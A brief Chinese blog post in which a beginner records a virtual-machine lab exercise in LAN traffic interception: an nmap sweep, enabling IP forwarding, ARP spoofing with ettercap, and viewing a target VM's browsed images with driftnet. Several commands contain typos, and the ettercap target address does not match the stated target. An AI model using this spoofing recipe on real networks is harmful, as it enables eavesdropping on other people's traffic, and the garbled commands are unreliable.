虚拟机下模拟内网APP欺骗(小白)
过程比较顺利 ,教程比较全面,但这远远不够, 原理一点还不懂.先把过程写下来吧,供自己以后查看1 查看本机IP信息ifcongfig2 扫描局域网IPnmap -sP 192.168.58.0/24选择 192.168.58.138 作为目标ip3 开启流量转发ehco 1 >> /proc/sys/net/ipv4/ip forward4 使用arpspoof/ett
·
过程比较顺利 ,教程比较全面,但这远远不够, 原理一点还不懂.先把过程写下来吧,供自己以后查看
1 查看本机IP信息
ifcongfig
2 扫描局域网IP
nmap -sP 192.168.58.0/24
选择 192.168.58.138 作为目标ip
3 开启流量转发
ehco 1 >> /proc/sys/net/ipv4/ip forward
4 使用arpspoof/ettercap,选一个进行arp欺骗。获取从192.168.58.1(路由器) 到 192.168.58.138(目标机)的流量
ettercap -T -q -M ARP /172.17.171.21// /
5 用driftnet进行流量监控,显示图片
driftnet -i eth0
6 结果如图 在同一主机中的虚拟机上的xp(192.168.58.138)正在浏览图片(女神 刘亦菲),用driftnet 清楚显示
参考链接 http://blog.csdn.net/u012218652/article/details/70761564
更多推荐
已为社区贡献2条内容
所有评论(0)